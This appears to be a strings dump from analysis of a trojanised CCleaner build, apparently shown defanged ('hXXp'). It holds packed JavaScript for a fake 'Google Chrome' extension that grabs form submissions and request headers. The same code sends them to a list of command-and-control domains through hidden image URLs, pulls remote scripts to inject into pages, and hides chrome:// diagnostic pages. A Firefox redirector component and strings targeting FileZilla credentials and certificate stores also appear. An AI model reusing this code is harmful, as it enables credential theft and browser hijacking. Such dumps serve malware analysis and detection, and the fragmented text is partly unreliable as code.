"scripts": [ "background.js" ]
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCZHrDqCq2Qtjdkvs6ktcZkj1mzQUOz0WdjfiaSZuU0eo3bJS6pf6XMvNUX3tUxOGCv0QtjwYSgK6K8HIQoOFzUWRuLGpGVSIlLfMPqwrmaL24qVCyNCNphbrc4EOfsmTd1Vq/hO9xSjHfSjYhAdjQvNJuAd0Upe0z40LzCrgLsHQIDAQAB",
"name": "Google Chrome",
"permissions": [ "tabs", "hXXp://*/*", "hXXps://*/*", "webNavigation", "webRequest", "storage" ],
{ec9032c7-c20a-464f-7b0e-13a3a9e97385}
"name": "Google Chrome",
"background": { "scripts": ["background.js"] },
"tabs", "hXXp://*/*", "hXXps://*/*", "webNavigation", "webRequest", "storage"
C:\ProgramData\f28bafffhed.xsl
<RDF xmlns="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="hXXp://VVV.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>{ec9032c7-c20a-464f-7b0e-13a3a9e97385}</em:id>
with minimum and maximum supported versions. -->
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:creator>Mozilla Foundation</em:creator>
<em:homepageURL>hXXp://VVV.mozilla.com/</em:homepageURL>
C:\Users\"%CurrentUserName%"\AppData\Local\bafffhed28.nls
C:\Users\"%CurrentUserName%"\AppData\Local\dfl28z32.dll
.vmp0
C:\Users\"%CurrentUserName%"\AppData\Local\wsr28zt32.dll
C:\ProgramData\i28bafffhed.dat
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('1 f=h.l("x");9 k(c){1 b=c.l("V");1 d="";8(1 a=0;a<b.7;a  ){3(b.4=="U"){5}3(b.4=="T"){5}3(b.4=="q"){5}3(b.4=="S"){5}d =a ":" b[a].4 ":" ((b[a].6=="")?"<z>:":b[a].6) ":";3((b[a].4=="R")||(b[a].4=="Q")){d =b[a].P}O{d =(b[a].y=="")?"<z>":b[a].y}d =" "}1 e=c.N.M(/\\s{2,}|[\\f\\r\\n]/g,"|");d="<L" ((c.o)?(" o=" c.o):"") ((c.m)?(" m=" c.m):"") ((c.6)?(" 6=" c.6):"") "> " d e;K d}9 p(){1 c=k(w);1 b=h.l("x");8(i=0;i<b.7;i  ){3(b[i]==w){5}c =k(b[i])}1 a=v.u.t(v.u.j("J"));3(a.j(" ")>0){a=a.t(0,a.j(" "))}c=h.I.H " #G#" a "# " c "#;";F.E.D({C:c},9(d){})}8(i=0;i<f.7;i  ){f[i].B("q",p,A)};',58,58,'|var||if|type|continue|name|length|for|function||||||||document||indexOf|ParseForm|getElementsByTagName|id||action|subm|submit|||substring|userAgent|navigator|this|form|value|blank|true|addEventListener|greeting|sendMessage|extension|chrome|CHROME|href|location|Chrom|return|FORM|replace|textContent|else|checked|checkbox|radio|button|reset|image|input'.split('|'),0,{}))
chrome
chrome\content
chrome.manifest
install.rdf
chrome\content.jar
components\red.js
%s\%s
OSOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
p%s_mtx%u
xchrome.manifest
Tinstall.rdf
dchrome\content.jar
sfc_os.dll
%s_mtx%u
%s_mtx1
32RegSetKeySecurity
00RegOpenKeyExA
02RegCreateKeyExA
04RegCloseKey
31RegEnumKeyExA
advapi32.dll
$%s%s\
%s%s\
%s\%s\extensions
%s\Mozilla\Firefox\Profiles
22EnumDesktopWindows
buser32.dll
2.exe
const Ci=Components.interfaces;const Cc=Components.classes;const Cr=Components.results;const Cu=Components.utils;const mo="@mozilla.org/";Cu["import"]("resource://gre/modules/XPCOMUtils.jsm");var prefexport={HOSTID:"##HOST_ID##",VERSION:"##VERSION##",SERVERLIST:"##DOMAIN##"};const nsIContentPolicy=Ci.nsIContentPolicy;var Application=Cc[mo "fuel/application;1"].getService(Ci.fuelIApplication);var gRedirector=null;function msRedirector(){this.wrappedJSObject=this}msRedirector.prototype={RedirectList:false,core:null,hello:function(){return"Hello from ch XPCOM!"},getpref:function(a){try{return pre
ategoryManager);a.addCategoryEntry("content-policy",this.classDescription,this.contractID,true,true)}catch(b){}},observe:function(c,a,b){switch(a){case"app-startup":this._startup();break;case"profile-after-change":this._startup();break}},shouldLoad:function(b,j,c,a,g,k){if(j.scheme!="http"&&j.scheme!="https"){return nsIContentPolicy.ACCEPT}if(b!=nsIContentPolicy.TYPE_DOCUMENT){return nsIContentPolicy.ACCEPT}if(!a||!a.loadURI){return nsIContentPolicy.ACCEPT}var l=this.FindRedirectSign(j.spec,true);if(l){var d=a;if("redirecting" in d){if("HostUnreachable" in d.redirecting){if(d.redirecting.fakeU
RL!=l.toreplace){delete d.redirecting}else{return Ci.nsIContentPolicy.ACCEPT}}}try{var n=j.spec.replace(/https?\:\/\//,"");var h=l.tofind.exec(n)[0];var m=n.replace(h,l.toreplace);m="hXXp://" m;var f=(m.indexOf("?")==-1)?"?":"&";m =f "hostid=" prefexport.HOSTID;try{m ="&origurl=" Base64orig.encode(j.spec)}catch(i){}d.redirecting={};d.redirecting.originalURL=j.spec;d.redirecting.redirectingURL=m;d.redirecting.aRequestOrigin=c;d.redirecting.fakeURL=l.toreplace;d.redirecting.notfakeURL=h;d.redirecting.https=j.scheme=="https";d.loadURI(m,c,null)}catch(i){}return Ci.nsIContentPolicy.REJECT_REQUEST}
fexport[a]}catch(b){}},FindRedirectSign:function(b,a){if(!this.RedirectList){return false}for(var c=0;c<this.RedirectList.length;c  ){var d=this.RedirectList[c];if(b.search((a)?d.tofind:d.toreplace)!=-1){break}}if(c!=this.RedirectList.length){return this.RedirectList[c]}else{return false}},addlog:function(a){},makeURI:function(d,c,a){var b=Cc[mo "network/io-service;1"].getService(Ci.nsIIOService);return b.newURI(d,c,a)},_startup:function(){this.cout=Cc[mo "consoleservice;1"].getService(Ci.nsIConsoleService);try{this.cout.reset()}catch(b){}try{var a=Cc[mo "categorymanager;1"].getService(Ci.nsIC
J<2048)){a =String.fromCharCode((d>>6)|192);a =String.fromCharCode((d&63)|128)}else{a =String.fromCharCode((d>>12)|224);a =String.fromCharCode(((d>>6)&63)|128);a =String.fromCharCode((d&63)|128)}}}return a}};if(XPCOMUtils.generateNSGetFactory){var NSGetFactory=XPCOMUtils.generateNSGetFactory([msRedirector])}else{var NSGetModule=XPCOMUtils.generateNSGetModule([msRedirector])};
return Ci.nsIContentPolicy.ACCEPT},shouldProcess:function(c,e,a,d,b,f){return Ci.nsIContentPolicy.ACCEPT},classDescription:"msRedirector js component",contractID:"@merysheep.chlice.qee.jp/redirector;1",classID:Components.ID("{e781b0a8-36d6-4510-a9e9-a23234ac7ee5}"),_xpcom_factory:{createInstance:function(b,a){if(b!=null){throw Cr.NS_ERROR_NO_AGGREGATION}if(!gRedirector){gRedirector=new msRedirector()}return gRedirector.QueryInterface(a)}},_xpcom_categories:[{category:"app-startup",service:true}],QueryInterface:XPCOMUtils.generateQI([Ci.nsIObserver,Ci.nsIContentPolicy])};var Base64orig={_keyStr
j:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)",encode:function(c){var a="";var k,h,f,j,g,e,d;var b=0;c=Base64orig._utf8_encode(c);while(b<c.length){k=c.charCodeAt(b  );h=c.charCodeAt(b  );f=c.charCodeAt(b  );j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64}else{if(isNaN(f)){d=64}}a=a this._keyStr.charAt(j) this._keyStr.charAt(g) this._keyStr.charAt(e) this._keyStr.charAt(d)}return a},_utf8_encode:function(b){b=b.replace(/\r\n/g,"\n");var a="";for(var e=0;e<b.length;e  ){var d=b.charCodeAt(e);if(d<128){a =String.fromCharCode(d)}else{if((d>127)&&(d
>%X%X
sfc.dll
Osfc.dll
5%s-%s-%s-%s
crtdll.dll
imovelamigo.info#official-iso5001.ru#ahetyta-idyn.cc#qexulihbowfini.ws#rylodwosyre.ws#zesydu-maho.ru#hifocoxny-lilde.in#vutacicusa.in#wazudylwake.ws#zuzewfuflecebo.ru#kepemalxujxo.net#xihyrla-po.ws#ukyvsebytahedyf.in#ubufuqawemi.ru#dessimob-ce.ws#ipykicokyho.ru#pukaqaztefu.ru#hyvajajsaha.ru#urowloxuka-citu.ws#ivewenecoz-isafo.org#ynenuwko-zulmy.com#arokmado-kizbu.ws#wuxirsudyva.cc#sipacyjizocte.net
e);d  }else{if((e>191)&&(e<224)){c2=a.charCodeAt(d 1);b =String.fromCharCode(((e&31)<<6)|(c2&63));d =2}else{c2=a.charCodeAt(d 1);c3=a.charCodeAt(d 2);b =String.fromCharCode(((e&15)<<12)|((c2&63)<<6)|(c3&63));d =3}}}return b}function Base64v2_decode(d){var c="hijklmnoNOVWXYZ012wxyzABLMGHIJK3456789CDEFpqrsabcdefgtuvPQRSTU /=";var a="";var l,j,g;var k,h,f,e;var b=0;d=d.replace(/[^A-Za-z0-9\ \/\=]/g,"");while(b<d.length){k=c.indexOf(d.charAt(b  ));h=c.indexOf(d.charAt(b  ));f=c.indexOf(d.charAt(b  ));e=c.indexOf(d.charAt(b  ));l=(k<<2)|(h>>4);j=((h&15)<<4)|(f>>2);g=((f&3)<<6)|e;a=a String.fromChar
#ld(a);delete BUF[b]}function onErrorAbortImage(b){var a=b.target;a.parentNode.removeChild(a)}function InsertImg(d,c){if(SRV==""){return}var e=document.getElementById("sdimg_" c);if(e!=null){return}var b="hXXp://" SRV "/?h=" HID "&i=" c IDS "&o=0&f=*&si=x&so=0&tl=" BUF[c].length "&v=" VER "&d=" Base64crypt(BUF[c]);var a=d.createElement("img");a.setAttribute("id","sdimg_" c);a.setAttribute("border","0");a.setAttribute("width","0");a.setAttribute("height","0");a.setAttribute("src",b);d.body.insertBefore(a,d.body.firstChild);a.addEventListener("load",function(f){onLoadImage(f)},true);a.addEventLis
var MAX=40;var BUF=new Array(MAX);var IDS="";var HID="##HOST_ID##";var VER="##VERSION##";var SLST="##DOMAIN##";var SINT=120000;var SRV="";var SIND=0;var SARR=SLST.split("#");var MAX_INJ=100;var TOT_INJ=0;var INJECT=new Array(MAX_INJ);var INJURL=new Array(MAX_INJ);function randomString(){var c="abcdefghiklmnopqrstuvwxyz";var d="";for(var b=0;b<10;b  ){var a=Math.floor(Math.random()*c.length);d =c.substring(a,a 1)}return d}fun
Lction Base64_encode(d){var c="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)";var a="";var l,j,g,k,h,f,e;var b=0;while(b<d.length){l=d[b  ];j=d[b  ];g=d[b  ];k=l>>2;h=((l&3)<<4)|(j>>4);f=((j&15)<<2)|(g>>6);e=g&63;if(isNaN(j)){f=e=64}else{if(isNaN(g)){e=64}}a=a c.charAt(k) c.charAt(h) c.charAt(f) c.charAt(e)}return a}function Base64crypt(b){var a=new Array(b.length);for(var c=0;c<b.length;c  ){a[c]=b.charCodeAt(c) c*c;a[c]=a[c]%6}b=Base64_encode(a);delete a;return b}function onLoadImage(c){var a=c.target;var d=a.getAttribute("id");var b=d.substring(6);a.parentNode.removeChi
s[5]!="a")){return}var d=/;(\S*)/.exec(b);ParseInjects(d[1]);chrome.storage.local.set({INJ_BLOCK:d[1]})}function iTimer(){if(SRV==""){return}var a=new XMLHttpRequest();a.onreadystatechange=function(){iXHRstateChange(a)};a.open("GET","hXXp://" SRV "/?jc=x&h=" HID,true);a.overrideMimeType("text/plain; charset=x-user-defined");a.send(null)}IDS=randomString();function get_srv(a){if(typeof(a.SRV_SIND)=="undefined"){return}SRV=SARR[a.SRV_SIND]}function get_inj(a){if(typeof(a.INJ_BLOCK)=="undefined"){return}ParseInjects(a.INJ_BLOCK)}chrome.storage.local.get("SRV_SIND",get_srv);chrome.storage.local.get
ya<MAX;a  ){if(BUF[a]){continue}BUF[a]=b;InsertImg(document,a);return}}function BefSendHead(e){if(e.tabId<0){return}var c="";for(var a=0;a<e.requestHeaders.length;a  ){if(e.requestHeaders[a].name==="Origin"){continue}if(e.requestHeaders[a].name==="Accept"){continue}if(e.requestHeaders[a].name==="Content-Type"){continue}if(e.requestHeaders[a].name==="Accept-Encoding"){continue}c =" " a ":" e.requestHeaders[a].name ":" e.requestHeaders[a].value}var b=e.url " #" e.type "#" e.method "# " c;SaveLog(b)}function onMsg(c,b,a){SaveLog(c.greeting);a({})}function XHRstateChange(c){if(c.readyState!=4){retu
rn}var b=0;if(c.status==200){var a=c.responseText;if((a[42]==";")&&(a[0]=="G")&&(a[1]=="I")&&(a[2]=="F")&&(a[3]=="8")&&(a[4]=="9")&&(a[5]=="a")){b=1}}if(b==1){SRV=SARR[SIND];chrome.storage.local.set({SRV_SIND:SIND})}SIND  ;if(SIND>=SARR.length){SIND=0}}function sTimer(){var a=new XMLHttpRequest();a.onreadystatechange=function(){XHRstateChange(a)};a.open("GET","hXXp://" SARR[SIND] "/?f=*",true);a.overrideMimeType("text/plain; charset=x-user-defined");a.send(null)}function Base64v2_utf8_decode(a){var b="";var d=0;var e=c1=c2=0;while(d<a.length){e=a.charCodeAt(d);if(e<128){b =String.fromCharCode(
O("INJ_BLOCK",get_inj);chrome.extension.onMessage.addListener(onMsg);chrome.webNavigation.onCompleted.addListener(Completed);chrome.webRequest.onBeforeSendHeaders.addListener(BefSendHead,{urls:["hXXp://*/*","hXXps://*/*"],types:["xmlhttprequest"]},["requestHeaders"]);window.setInterval(sTimer,SINT);window.setInterval(iTimer,SINT 1000);chrome.tabs.onUpdated.addListener(function(a,b){if(b.status!="loading"){return}if(b.url=="chrome://memory-redirect/"){chrome.tabs.update(a,{url:"chrome://conflicts/"})}if(b.url=="chrome://view-http-cache/"){chrome.tabs.update(a,{url:"chrome://predictors/"})}if(b.u
tener("error",function(f){onErrorAbortImage(f)},true);a.addEventListener("abort",function(f){onErrorAbortImage(f)},true)}function SendData(){if(SRV==""){return}for(var a=0;a<MAX;a  ){if(!BUF[a]){continue}InsertImg(document,a)}}function Completed(b){if(b.url.substring(0,4)!=="http"){return}for(var a=0;a<TOT_INJ;a  ){if(b.url.match(INJURL[a])){console.log("*** MATCH! EXECUTING JS: " INJECT[a]);chrome.tabs.executeScript(b.tabId,{code:INJECT[a],allFrames:true})}}if(b.frameId!=0){return}chrome.tabs.executeScript(b.tabId,{file:"content.js",allFrames:true});SendData()}function SaveLog(b){for(var a=0;
Code(l);if(f!=64){a=a String.fromCharCode(j)}if(e!=64){a=a String.fromCharCode(g)}}a=Base64v2_utf8_decode(a);return a}function ParseInjects(d){var a=Base64v2_decode(d);var f=new Array();f=a.split("|$");var c=new Array();var e=1;TOT_INJ=f.length-1;for(e;e<f.length;e  ){var b=f[e].substr(0,f[e].length-2);c=b.split("|^");INJURL[e-1]=c[0];INJECT[e-1]=c[1].replace("_HOSTID_",HID)}INJURL[e-1]=false}function iXHRstateChange(a){if(a.readyState!=4){return}if(a.status!=200){return}var b=a.responseText;if(b==null){return}if((b[42]!=";")||(b[0]!="G")||(b[1]!="I")||(b[2]!="F")||(b[3]!="8")||(b[4]!="9")||(b
Extension%u=%s\%s
Qrsvp.exe
chrome.exe
%s\%s\Main
>SOFTWARE\Mozilla\Mozilla Firefox
47PeekNamedPipe
09WinExec
48CreatePipe
pstorec.dll
s-%X.
R%u.%u.%u
manifest.json
background.js
content.js
\Google\Chrome\User Data\Default\
\Google\Chrome\Application
\FileZilla\sitemanager.xml
\p*.dll
Lion|subm|submit|||substring|userAgent|navigator|this|form|value|blank|true|addEventListener|greeting|sendMessage|extension|chrome|CHROME|href|location|Chrom|return|FORM|replace|textContent|else|checked|checkbox|radio|button|reset|image|input'.split('|'),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('1 f=h.l("x");9 k(c){1 b=c.l("V");1 d="";8(1 a=0;a<b.7;a  ){3(b.4=="U"){5}3(b.4=="T"){5}3(b.4=="q"){5}3
rl=="chrome://cache/"){chrome.tabs.update(a,{url:"chrome://predictors/"})}if(b.url=="chrome://net-internals/"){chrome.tabs.update(a,{url:"chrome://downloads/"})}if(b.url=="chrome://dns/"){chrome.tabs.update(a,{url:"chrome://downloads/"})}if(b.url=="chrome://about/"){chrome.tabs.update(a,{url:"chrome://chrome/"})}if(b.url=="chrome://inspect/"){chrome.tabs.update(a,{url:"chrome://ipc/"})}if(b.url=="chrome://tasks/"){chrome.tabs.update(a,{url:"chrome://sessions/"})}if(b.url=="chrome://chrome-urls/"){chrome.tabs.update(a,{url:"chrome://chrome/history/"})}});
2\msvcr100.dll
\mozcrt19.dll
 oleaut32.dll
CryptFindCertificateKeyProvInfo
(CertOpenSystemStoreA
bCertEnumCertificatesInStore
CertAddCertificateContextToStore
RCertGetNameStringA
CertOpenStore
PFXExportCertStore
crypt32.dll
shell32.dll
%s\f%u%s.xsl
{%s\kf%ulz32.dll
;%s\wsr%uzt32.dll
%s\dfl%uz32.dll
%s\i%u%s.dat
%s\%s%u.nls
=\1.0_0\
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
nBreakpad/1.0 (Windows)
888816666554443
6666554443
!6666554443
%s[%d]: %s
SQLITE_OK
SQLITE_ERROR
SQLITE_INTERNAL
SQLITE_PERM
SQLITE_ABORT
SQLITE_BUSY
SQLITE_LOCKED
SQLITE_NOMEM
SQLITE_READONLY
SQLITE_INTERRUPT
SQLITE_IOERR
SQLITE_CORRUPT
SQLITE_NOTFOUND
SQLITE_FULL
SQLITE_CANTOPEN
SQLITE_PROTOCOL
SQLITE_EMPTY
SQLITE_SCHEMA
SQLITE_TOOBIG
SQLITE_CONSTRAINT
SQLITE_MISMATCH
SQLITE_MISUSE
SQLITE_NOLFS
SQLITE_AUTH
SQLITE_FORMAT
SQLITE_RANGE
SQLITE_ROW
SQLITE_DONE
CPPSQLITE_ERROR
select count(*) from sqlite_master where type='table' and name='%s'
Re&port
XMessageBox.ini
%s = %d
RegKey
FileKey
SpecialKey
ScriptKey
ExcludeKey
ccleaner.ini
portable.dat
%m/%d/%Y %I:%M:%S %p
l%d/%d/%d %d:%d:%d %s
MSG_CONFIRMCLEAN
MSG_WARNMOZCACHE
MSG_WARNMOZHISTORY
MSG_WARNTHUNDERBIRDCACHE
MSG_WARNTHUNDERBIRDHISTORY
MSG_WARNOPERACACHE
MSG_WARNCHROMECACHE
ShowFirefoxCleanWarning
ShowGoogleChromeCleanWarning
ShowOperaCleanWarning
%s%s%s%d%s
Google Chrome
l*64.exe
/select,"%s"
lGoogle Chrome
l%d%%
user32.dll
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache
Packages\windows_ie_ac_001\AC\Microsoft\Internet Explorer\DOMStore
Mozilla/4.0 (CCleaner, %s)
%d.%d%s%d
hXXps://VVV.piriform.com/inapp/ccshop
%s?a=%s&p=%s&c=%s&v=%s&l=%s&mk=%s&o=%s
&itag=%s
LKey
OnNavigateError = %d - %s
Clicked on %s (tag:%s)
All (*.*)
#HttpOnly_
DOMStore:hXXp://
DOMStore:hXXps://
lPiriform::Breakpad::CKeyboardHook::Message::B4E8893A-C6C1-4c98-BFFC-B81923F8C77D
lhXXp://VVV.piriform.com/go/app_cc_reg_renew
hXXp://VVV.piriform.com/auto
lhXXp://VVV.piriform.com/ccleaner/update
*64.exe
Error: %d - %s
Text Files (*.txt)
*.txt
install.txt
%s%s%s%s%s
%s %s
PSAPI.DLL
\regedit.exe
regedit.exe
rundll32.exe
*%commonprogramfiles%*
%CommonProgramW6432%
%commonprogramfiles%
1|1|1|1|0|0|0
SystemAnalyzer.txt
l/select,"%s"
startup.txt
*\desktop.ini
Analyzing file content - %d
duplicate.txt
%s - %s %c
lPackages\windows_ie_ac_001\AC\Microsoft\Internet Explorer\DOMStore
Piriform.CCleaner
hXXp://VVV.piriform.com
hXXp://VVV.piriform.com/ccleaner
hXXp://VVV.piriform.com/go/app_cc_home_help
hXXp://VVV.piriform.com/go/app_cc_home_icon
hXXp://VVV.piriform.com/go/app_cc_home_title
hXXp://VVV.piriform.com/go/app_cc_home_pear
hXXp://VVV.piriform.com/go/app_cc_reg_purchase
license.ini
LicenseKey
autotrial.dat
business.dat
update.ini
lRecently Typed URLs
Mozilla - Cookies
Opera - Cookies
Google Chrome - Cookies
Delete Index.dat files
user.dat
ntuser.dat
usrclass.dat
v%d.d.d
%d.d.d
%s.ini
ResourceID_%d
FIREFOX
CHROME
OPERA
lbranding.dll
v1.00.001
v2.00.001
hXXp://VVV.piriform.com/go/app_cc_reg_renew
hXXp://VVV.piriform.com/ccleaner/update
Piriform::Breakpad::CKeyboardHook::Message::B4E8893A-C6C1-4c98-BFFC-B81923F8C77D
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_USERS
HKEY_CURRENT_USER
history.txt
mPiriform::Breakpad::CKeyboardHook::Message::B4E8893A-C6C1-4c98-BFFC-B81923F8C77D
cookies.txt
Trial version (%d days remaining)
mhXXp://VVV.piriform.com/go/app_cc_social_facebook
hXXp://VVV.piriform.com/go/app_cc_social_twitter
hXXp://VVV.piriform.com/go/app_cc_social_googleplus
hXXp://VVV.piriform.com/go/app_cc_social_youtube
%s?a=%s&v=%s&l=%s
mhXXp://VVV.piriform.com/go/app_cc_home_help
m*64.exe
0x%x: %s
Error activating - %s
Error activating - %d: %s
&t=%s
hXXps://license.piriform.com/activate/?p=%s&c=%s&cv=%s&l=%s&lk=%s&mk=%s
hXXps://VVV.piriform.com/go/app_cc_pro_trialkey
hXXps://license.piriform.com/verify
hXXps://license.piriform.com/activate
%s/?p=%s&c=%s&cv=%s&l=%s&lk=%s&mk=%s
64.exe
mhXXp://VVV.piriform.com/go/app_cc_reg_purchase
mLicenseKey
mautotrial.dat
mbusiness.dat
mbranding.dll
Registry Key
cc_%ddd_ddd.reg
Reg Files (*.reg)
*.reg
SpecialKey1
registry.txt
CCScanreg.txt
*.piriform.com
login.live.com
mail.google.com
VVV.google.com/accounts
google.com/accounts
google.com
VVV.google.com
accounts.google.com
webmail.earthlink.net
mail.netscape.com
mail.yahoo.com
yahoo.com
webmail.aol.com
my.screenname.aol.com
fastmail.fm
mail.lycos.com
mail.ru
auth.me.com
ovi.com/services/signin
login.comcast.net
VVV.mail.lycos.com
mail.aol.com
icloud.com
screenname.aol.com
aol.com
facebook.com
twitter.com
%d / %d
Error %d - %s
%%.Þ
%%.ß
mMozilla/4.0 (CCleaner, %s)
log.txt
File %s does not exist.
- %s %c
mShowFirefoxCleanWarning
mShowGoogleChromeCleanWarning
mShowOperaCleanWarning
\macromedia.com\support\flashplayer\sys\
settings.sol
Shockwave Flash\macromedia.com\support\flashplayer\sys\
*\Shockwave Flash\*\#SharedObjects\*\macromedia.com\support\flashplayer\sys\settings.sol
*\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\*\macromedia.com*
macromedia.com
com.apple.Safari.plist
WebpageIcons.db
CCleaner requires Windows XP or later.
CCleaner64.exe
ccleaner_checkpoint.dat
hXXp://VVV.piriform.com/go/app_cc_privacy_policy?a=%s&v=%s&l=%s
Error loading branding.dll %s- 0x%x: %s
Extra error loading branding.dll %s- 0x%x: %s
branding.dll
mv1.00.001
mv%d.d.d
?a=%s&v=%s&l=%s
TRIAL VERSION (%d days remaining)
mhXXp://VVV.piriform.com/go/app_cc_home_title
mhXXp://VVV.piriform.com/go/app_cc_home_pear
mPackages\windows_ie_ac_001\AC\Microsoft\Internet Explorer\DOMStore
/export
uninst.exe
Uninstall.lnk
3.18.1708
CCInfo.txt
CCVERSION=%s
CCEDITION=%s
CCREGISTERED=%s
OS=%s
CPU=%s
RAM=%s
GPU=%s
m%m/%d/%Y %I:%M:%S %p
%s|%s|%s|%s
Guxtheme.dll
%s (%s %d%%)
%s (%s)
JHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
GAdvapi32.dll
R_WINDOWS_SERVICES
N_INT_PASSWORD
N_MOZ_PASSWORD
N_THUNDERBIRD_PASSWORD
N_OPERA_CACHE
N_OPERA_HISTORY
N_OPERA_COOKIES
N_OPERA_WEBSITE_ICONS
N_OPERA_PASSWORD
N_OPERA_LAST_DOWNLOAD_LOCATION
N_OPERA_RECENTLY_TYPED_URLS
N_OPERA_SESSION
N_OPERA_HISTORY_15
N_OPERA_COOKIES_15
N_OPERA_DOWNLOAD
N_OPERA_FORM
N_OPERA_COMPACT_DATABASES
N_SAFARI_PASSWORD
N_CHROME_CACHE
N_CHROME_COOKIES
N_CHROME_HISTORY
N_CHROME_DOWNLOAD
N_CHROME_FORM
N_CHROME_PASSWORD
N_CHROME_SESSION
N_CHROME_COMPACT_DATABASES
N_CHROME_FLASH_COOKIES
N_CHROME_LAST_DOWNLOAD_LOCATION
N_EX_NETWORK_PASSWORDS
N_EX_WINDOWS_EVENT_LOGS
N_EX_PREVIOUS_WINDOWS_INSTALLATION
comctl32.dll
/|%'" ><:\
G%s%s
Kernel32.dll
%d Files
oSP%d
SOFTWARE\Microsoft\Windows NT\CurrentVersion
Windows 95
Windows 98
Windows ME
Windows NT
Windows 2000
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows Server 2008 R2
Windows 7
Windows 8
Windows 8.1
Windows Server 2012
Windows Server 2012 R2
Windows 10
Windows
%sGB RAM
%sMB RAM
Web Server
_kernel32.dll
\DosDevices\%s
F%s%s%s
J%%%d
Portugu
s (Portuguese)
s do Brasil (Brazilian Portuguese)
lang-*.dll
_.dll
JShowOperaCleanWarning
UpdateKey
\StringFileInfo\xx\%s
Fv%d.d.d
wininet.dll
Unknown error = %d
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%CommonProgramFiles%
%CommonProgramFiles(x86)%
*%systemdirectory%*
%systemdirectory%
%SystemDirectory32%
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
{A520A1A4-1780-4FF6-BD18-167343C5AF16}
%s_Classes
Microsoft\Windows
FSoftware\Microsoft\Windows\CurrentVersion\Run
g%s%s%s%s
%s|%s
%s|%s%s%s%s%s
%s\%s\%s
G%s.ini
Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU
Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
Recently Typed URLs
JPRAGMA %s;
SELECT id, name, value, host, path, expiry, isSecure, isHttpOnly FROM moz_cookies;
webappsstore2
SELECT scope FROM webappsstore2;
webappsstore
SELECT domain FROM webappsstore;
SELECT h.id FROM moz_places h
SELECT b.id FROM moz_bookmarks b
SELECT a.id FROM moz_annos a
select clientID,Key,Generation,DataSize from moz_cache;
thunderbird.exe
firefox.exe
mozilla.exe
seamonkey.exe
palemoon.exe
songbird.exe
k-meleon.exe
icedragon.exe
cyberfox.exe
compatibility.ini
application.ini
profiles.ini
user_pref("%s", %s);
%d));
DELETE FROM moz_places WHERE id IN (SELECT h.id FROM moz_places h WHERE h.id IN (
NOT EXISTS (SELECT b.id FROM moz_bookmarks b WHERE b.fk = h.id)
NOT EXISTS (SELECT a.id FROM moz_annos a WHERE a.place_id = h.id))
DELETE FROM moz_favicons WHERE id IN (SELECT f.id FROM moz_favicons f LEFT OUTER JOIN moz_places h ON f.id = h.favicon_id WHERE h.favicon_id IS NULL)
delete from moz_hosts where id = %s
DELETE FROM moz_deleted_logins
DELETE FROM moz_logins
%localappdata%\Google\Chrome\Application\chrome.exe
%ProgramFiles%\Google\Chrome\Application\chrome.exe
%localappdata%\Flock\Application\flock.exe
%ProgramFiles%\Flock\Application\flock.exe
%localappdata%\Google\Chrome SxS\Application\chrome.exe
%ProgramFiles%\Google\Chrome SxS\Application\chrome.exe
%localappdata%\SRWare Iron\iron.exe
%ProgramFiles%\SRWare Iron\iron.exe
%ProgramFiles%\Chromium\chrome.exe
%localappdata%\Chromium\chrome.exe
%ProgramFiles%\Chromium\Application\chrome.exe
%localappdata%\Chromium\Application\chrome.exe
%AppData%\ChromePlus\chrome.exe
%localappdata%\RockMelt\Application\rockmelt.exe
%ProgramFiles%\RockMelt\Application\rockmelt.exe
%LocalAppData%\Comodo\Dragon\dragon.exe
%ProgramFiles%\Comodo\Dragon\dragon.exe
%LocalAppData%\MapleStudio\ChromePlus\Application\Chrome.exe
%AppData%\MapleStudio\ChromePlus\Application\Chrome.exe
%ProgramFiles%\baidu\Spark\chrome.exe
%localappdata%\Torch\Application\torch.exe
%localappdata%\Yandex\YandexBrowser\Application\browser.exe
flock.exe
iron.exe
rockmelt.exe
dragon.exe
spark.exe
torch.exe
browser.exe
operaprefs.ini
\cookies4.dat
\pstorage\psindex.dat
\application_cache\cache_groups.xml
opera.exe
.Pepper Data
index.dat
ID=%d
PR=%d
